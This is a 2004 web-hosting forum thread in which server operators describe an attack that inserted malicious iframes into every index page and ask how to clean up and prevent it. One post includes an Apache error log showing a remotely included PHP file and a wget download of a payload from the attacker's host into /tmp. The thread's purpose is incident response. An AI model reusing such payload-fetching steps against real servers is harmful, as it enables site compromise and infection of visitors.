Web Hosting Talk

Index pages modified, iframes linking to b00gle.com inserted

Barty
05-22-2004, 10:39 AM
I've been having some security problems, obviously: somehow all index files have been altered by a script. An iframe linking to b00gle.com (a certain page on that site, containing a lot of javascripts, worms, IE exploits, ...) has been inserted so that all visitors viewing the altered files get pop-ups and scripts thrown at them.

Does anyone have experience dealing with these things? Can anyone shed a light on how those things are done, and how to prevent them?

If there is a script to automatically remove a certain text (the inserted iframe for example) from all index-files, that would also be appreciated a lot.

Thanks in advance

sp-nyp
05-24-2004, 12:15 PM
I have done some google-ing and found a few other people that seemed to have this same problem.

I have been unsuccessful as of yet in finding the exploit that they used to hack into the system and change the files.

On the compromised box we are running RH 7.2 with ensim 3.1.0-25

I know there are also various php scripts running on our server and was wondering if there are any specific exploits that could be used to alter index files for sites....? I have not found any scripts that are common to all the sites hacked.

Any help would be greatly appreciated.

sprintserve
05-24-2004, 12:19 PM
Yes, you can do a search and replace. But before that, is that what was done? The code having been inserted into all the pages?

Barty
05-24-2004, 12:49 PM
On all index pages, this script added the iframe right after the <body> tag. I saved an 'infected' file, should it be useful to post here. But there's not much to see but an iframe linking to a certain page on b00gle.

I found the following things in my apache error log: (URLs changed slightly because of problems posting)

-------------------
ls: /usr/bin/X11/X: No such file or directory
[Thu May 20 02:18:15 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/2.inc on line 14


ls: /usr/bin/X11/X: No such file or directory
[Thu May 20 17:33:58 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/2.inc on line 14
ls: /usr/bin/X11/X: No such file or directory
--17:34:45-- b00gleDOTcom/cli.gz
=> `/tmp/a.out'
Resolving b00gleDOTcom... done.
Connecting to b00gleDOTcom[62.65.252.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,902 [text/plain]

0K .......... ...... 100% 14.96 KB/s

17:34:48 (14.96 KB/s) - `/tmp/a.out' saved [16902/16902]
-------------------

This might be useful: b00gleDOTcom/s/